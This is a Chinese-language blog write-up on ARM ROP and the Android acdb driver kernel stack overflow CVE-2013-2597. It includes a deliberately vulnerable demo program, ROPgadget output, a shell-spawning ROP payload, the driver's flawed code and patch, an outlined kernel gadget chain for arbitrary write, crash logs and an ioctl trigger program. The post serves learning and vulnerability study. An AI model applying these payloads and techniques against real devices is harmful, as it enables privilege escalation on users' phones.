Android内核栈溢出与ROP(CVE-2013-2597)

时间:2022-07-19 15:34:48

一、准备

由于内核栈不可执行(NX),栈溢出利用需用到ROP。简单回顾一下ARM ROP。

漏洞演示代码如下,网上随便找了个。

char *str="/system/bin/sh";

void callsystem()
{
  system("id");
}

void vulnerable_function() {
  char buf[128];
  read(STDIN_FILENO, buf, 256);
}

int main(int argc, char** argv) {
  if (argc == 2 && strcmp("passwd", argv[1]) == 0)
    callsystem();
  write(STDOUT_FILENO, "Hello, World\n", 13);
  vulnerable_function();
}

vulnerable_function函数使用read从标准输入读数据到buf缓冲区,未校验拷贝长度导致栈溢出。分析其汇编代码:

.text:000083BC vulnerable_function                     ; CODE XREF: main+68p
.text:000083BC
.text:000083BC buf             = -0x84
.text:000083BC
.text:000083BC                 STMFD   SP!, {R11,LR}
.text:000083C0                 ADD     R11, SP, #4
.text:000083C4                 SUB     SP, SP, #0x80
.text:000083C8                 SUB     R3, R11, #-buf
.text:000083CC                 MOV     R0, #0          ; fd
.text:000083D0                 MOV     R1, R3          ; buf
.text:000083D4                 MOV     R2, #0x100      ; nbytes
.text:000083D8                 BL      read
.text:000083DC                 SUB     SP, R11, #4
.text:000083E0                 LDMFD   SP!, {R11,PC}
.text:000083E0 ; End of function vulnerable_function

首先LR,R11寄存器压栈,接着分配0x80即128字节的buf栈缓冲区。R3指向buf缓冲区底部。分别通过R0,R1,R2传递3个参数,(0, buf, 0x100【256】),调用read函数。最后恢复R11,并将函数开始时压栈的LR(保存的返回地址)弹出到PC。

其栈结构如下:


高 LR : 4Bytes | R11 : 4Bytes 低 buf : 128Bytes

 

因此通过 132*‘A’ + addr 即可修改LR为addr,即而控制PC寄存器。我们的exploit目标是通过system(“/system/bin/sh”)返回一个shell。

system()地址,与“/system/bin/sh”字符串地址都可以找到。但system()参数是id,需要修改R0寄存器,指向“/system/bin/sh”地址。

.text:000083A8                 ADD     R3, PC, R3 ; aId ; "id"
.text:000083AC                 MOV     R0, R3          ; r0指向"id",目标是修改为指向"/system/bin/sh"
.text:000083B0                 BL      system

下面分析如何查找Gadgets。目前为止,我们能通过溢出控制程序的栈,要修改R0寄存器的值,我们需要 ldr r0 或 mov r0, sp + #xxx类似的指令,来从栈上取值。

当然这里考虑的是简单情况,像ldr r2mov r0, r2 等多条指令的组合都是符合要求的,我们使用ROPGadgets工具来查找Gadgets:https://github.com/JonathanSalwan/ROPgadget

注意的是,我们的程序编译的是Thumb指令集,需要查找Thumb的Gadgets:

zzhiyuan@ubuntu:~/Android_prj/ROP$ ROPgadget --binary=./bufferoverflow --thumb |grep "ldr r0, \[sp, "
...
0x00008a02 : ldr r0, [sp, #0xc] ; add sp, #0x14 ; pop {pc}
0x000091c2 : ldr r0, [sp, #0xc] ; add sp, #0x14 ; pop {pc} ; push {r3, lr} ; bl #0x91be ; pop {r3, pc}
0x00008872 : ldr r0, [sp, #0xc] ; adds r1, r4, #0 ; ldr r3, [r4, #0x10] ; blx r3
...
zzhiyuan@ubuntu:~/Android_prj/ROP$ 

下面是找到符合要求的Gadgets,它符合要求的原因是1)是可以通过栈上的值(sp, #0xc)修改r0寄存器。2)是可以利用栈上值进行程序跳转(pop {pc}):

0x00008a02 : ldr r0, [sp, #0xc] ; add sp, #0x14 ; pop {pc}

接下来利用它,来布局我们控制的栈,完成利用。

找到“/system/bin/sh”与system地址:

.rodata:00009780 aSystemBinSh    DCB "/system/bin/sh",0
.plt:00008494 ; int system(const char *)
.plt:00008494 system                                  ; CODE XREF: sub_94C4:loc_94C8j
.plt:00008494                 ADR     R12, 0x849C
.plt:00008498                 ADD     R12, R12, #0x2000
.plt:0000849C                 LDR     PC, [R12,#(system_ptr - 0xA49C)]! ; __imp_system

plt是ELF的延迟绑定,其指令为ARM的,因此system函数地址为0x00008494 ,“/system/bin/sh”是Thumb下的地址需加1:0x00009781

看下溢出时,如何布局栈:

Android内核栈溢出与ROP(CVE-2013-2597)

 

PoC构造如下:

*** ’A’x132 + 0x00008a03 + ’A’x12 + 0x00009781 + ’A’x4 + 0x00008494 ***

3处地址分别是:gadget addr , r0(system 参数), systemaddr

以下简单回顾完ARM上的ROP过程,与x86差不多,不过要注意处理Thumb还是ARM指令集。下面就分析CVE-2013-2597这个洞的exploit.

二、漏洞原理

CVE-2013-2597是一个内核态copy_from_user的栈溢出,拷贝长度size参数由用户态arg传入,且只校验了它非负,当传入大于MAX_IOCTL_DATA的值时,acdb_ioctl函数栈溢出。

uint32_t		data[MAX_IOCTL_DATA];
...
	if (copy_from_user(&size, (void *) arg, sizeof(size))) {

		result = -EFAULT;
		goto done;
	}
...
	if (size <= 0) {
		pr_err("%s: Invalid size sent to driver: %d\n",
			__func__, size);
		result = -EFAULT;
		goto done;
	}
...
	if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {

		pr_err("%s: fail to copy table size %d\n", __func__, size);
		result = -EFAULT;
		goto done;
	}

Patch很简单,只需校验用户传入长度小于data缓冲区大小:

	if ((size <= 0) || (size > sizeof(data))) {
		pr_err("%s: Invalid size sent to driver: %d\n",
			__func__, size);
		result = -EFAULT;
		goto done;
	}

三、漏洞利用

战略性放弃。。网上只有fi01的利用介绍,但调试发现其汇编与我在Nexus 5上撸下来的内核里面的不一致,差异太大目前写不出相应的exploit。中文只有莫灰灰与申迪两篇,都是直接照抄翻译fi01的。

但还是可以简单学习下,其思路。

首先在代码中没有发现Canary,福音 :-p

通过构造一个全0的data数据,可以从内核crach log中得到寄存器的值 (/proc/last_kmsg)。

      <3>[  348.770486] ACDB=> ACDB ioctl not found!
      <1>[  348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
      <1>[  348.770608] pgd = df18c000
      <1>[  348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
      <0>[  348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
      <4>[  348.770761] Modules linked in:
      <4>[  348.770791] CPU: 0    Not tainted  (3.0.8 #1)
      <4>[  348.770853] PC is at 0x9c
      <4>[  348.770883] LR is at acdb_ioctl+0x740/0x860
      <4>[  348.770944] pc : [<0000009c>]    lr : [<c0137658>]    psr: 60000013
      <4>[  348.770944] sp : ce513f28  ip : 00000000  fp : 00000098
      <4>[  348.771005] r10: 00000094  r9 : 00000090  r8 : 0000008c
      <4>[  348.771066] r7 : 00000088  r6 : 00000084  r5 : 00000080  r4 : 0000007c
      <4>[  348.771097] r3 : 00000000  r2 : ce513e74  r1 : c0973db8  r0 : 00000000
      <4>[  348.771158] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user

首先反汇编do_vfs_ioctl,并观察其返回:

c021d8fc: e2 8d d0 44           ADD     SP, SP, #0x44
c021d900: e8 bd 83 f0           LDMUW   [SP], { R4-R9, PC }

它将sp+0x44,并恢复r4-r9和pc值,因此通过布局栈,可以控制这些值,其中r5与r9下面有用。

由以上panic的寄存器值可以发现,只要将栈上pc,即0x9c偏移处覆盖,就可以控制第一跳,跳到下面这里:

c0381b98: e5 89 50 00           STR     R5, [R9]
c0381b9c: e8 bd 87 f0           LDMUW   [SP], { R4-R10, PC }

通过设置r5为shellcode地址,r9为内核fsync()符号地址,STR R5, [R9] 可以实现任意地址写的能力,这里非常巧妙的将栈溢出转为更容易利用的任意地址写任意值。

接着通过控制PC完成下一跳,跳到:

c0231b98: e2 8d d0 24           ADD     SP, SP, #0x24
c0231b9c: e8 bd 83 f0           LDMUW   [SP], { R4-R9, PC }

这一步ADD SP, SP, #0x24为了完成栈平衡。通过下图帮助理解:

Android内核栈溢出与ROP(CVE-2013-2597)

 

以上完成整个利用过程,并使do_vfs_ioctl正常返回不产生崩溃。

测试中,发现另一处内核Panic,不知道是不是0day?

[24953.996263] Unable to handle kernel paging request at virtual address ffffffee
[24953.996653] pgd = e9870000
[24953.996864] [ffffffee] *pgd=36beb821, *pte=00000000, *ppte=00000000
[24953.999564] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[24953.999804] CPU: 0    Not tainted  (3.4.0-gd59db4e #1)
[24954.000206] PC is at ion_free+0x14/0xbc
[24954.000437] LR is at msm_audio_ion_import+0x130/0x1b8
[24954.000659] pc : [<c04a0340>]    lr : [<c015c7a4>]    psr: 60000013
[24954.000673] sp : d613fdd0  ip : d613fdf0  fp : d613fdec
[24954.001240] r10: c122a024  r9 : ed3793a0  r8 : 00000000
[24954.001625] r7 : 00000000  r6 : c0e0fab4  r5 : c13a8cb0  r4 : c13a8cac
[24954.001844] r3 : 19761abc  r2 : 19761abc  r1 : ffffffea  r0 : dca15b00
[24954.002239] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[24954.002630] Control: 10c5787d  Table: 31c7006a  DAC: 00000015

测试代码:

#define OVERFLOW_BUFFER_SIZE  0xc0

struct acdb_ioctl {
    unsigned int size;
    char data[OVERFLOW_BUFFER_SIZE];
};

int test1()
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;

    int fd;
    int ret;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
      printf("failed to open %s due to %s.\n", device_name, strerror(errno));
      return -1;
    }

    arg.size = sizeof arg.data;
    memset(&arg.data, 0x0, arg.size);
    ret = ioctl(fd, 9999, &arg);
    close(fd);

    return 0;
}

四、参考

  1. https://www.codeaurora.org/news/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597

  2. https://gist.github.com/fi01/6097436

  3. https://gist.github.com/fi01/5857693

  4. http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html

五、附录

1)运行ROPgadget时报错:ImportError: No module named _sqlite3

解决办法:

1-安装sqlite3


sudo apt-get install libsqlite3-dev


2-重新编译安装Pyton

 

进入解压的Python 2.7.6目录

./configure --enable-loadable-sqlite-extensions
make
make install

2)ROPgadget –binary=./bufferoverflow –thumb |grep “ldr r0” 找不到Gadgets

上面ROP回顾,开始直接使用arm-linux-androideabi-gcc交叉编译的,遇到这个问题。但使用ndk-build就OK了。原因没分析。